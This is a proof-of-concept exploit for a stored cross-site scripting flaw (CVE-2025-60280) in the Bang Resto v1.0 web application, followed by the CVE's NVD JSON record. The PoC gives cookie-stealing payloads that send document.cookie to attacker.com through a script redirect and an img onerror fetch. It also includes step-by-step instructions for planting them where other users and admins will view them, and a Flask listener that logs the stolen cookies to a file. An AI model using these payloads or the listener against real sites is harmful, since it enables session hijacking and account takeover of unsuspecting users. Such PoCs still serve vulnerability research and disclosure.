CVE-2025-60280

<!-- CVE-2025-60280: Bang Resto v1.0 - Stored XSS PoC --> <!-- Inject the following payload into vulnerable input fields (e.g., comments, reviews, profile fields) --> <!-- Basic XSS payload to test for cookie stealing --> <script>document.location='http://attacker.com/steal?cookie='+document.cookie</script> <!-- Alternative payload using img tag onerror event handler --> <img src=x onerror="fetch('http://attacker.com/log?c='+document.cookie)"> <!-- Alternative payload using SVG tag --> <svg/onload=alert(document.cookie)> <!-- Steps to reproduce: 1. Log in to Bang Resto v1.0 as a regular user 2. Navigate to any input form (comment/review/feedback section) 3. Inject one of the above payloads into the input field 4. Submit the form 5. When another user (or admin) views the page containing the stored payload, the malicious JavaScript will execute in their browser context 6. The attacker's server will receive the victim's session cookie or other sensitive data --> <!-- Server-side listener (attacker.com/steal) example in Python Flask --> # from flask import Flask, request # app = Flask(__name__) # @app.route('/steal') # def steal(): # cookie = request.args.get('cookie') # with open('stolen_cookies.txt', 'a') as f: # f.write(cookie + '\n') # return 'OK' # if __name__ == '__main__': # app.run(host='0.0.0.0', port=80)

{"cve": {"id": "CVE-2025-60280", "sourceIdentifier": "[email protected]", "published": "2025-10-21T16:15:38.257", "lastModified": "2025-10-31T14:48:53.290", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Scripting (XSS) vulnerability in Bang Resto v1.0 could allow an attacker to inject malicious JavaScript code into the application's web pages. This vulnerability exists due to insufficient input sanitization or output encoding, allowing attacker-controlled input to be rendered directly in the browser. When exploited, an attacker can steal session cookies, redirect users to malicious sites, perform actions on behalf of the user, or deface the website. This can lead to user data compromise, loss of user trust, and a broader attack surface for more advanced exploitation techniques."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hockeycomputindo:bang_resto:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "E00A0E16-145F-4356-9B38-1BE60D2E4EAB"}]}]}], "references": [{"url": "https://github.com/debug-security/CVE/tree/main/CVE-2025-60280", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vwrap.live/stored-xss-in-bangresto", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}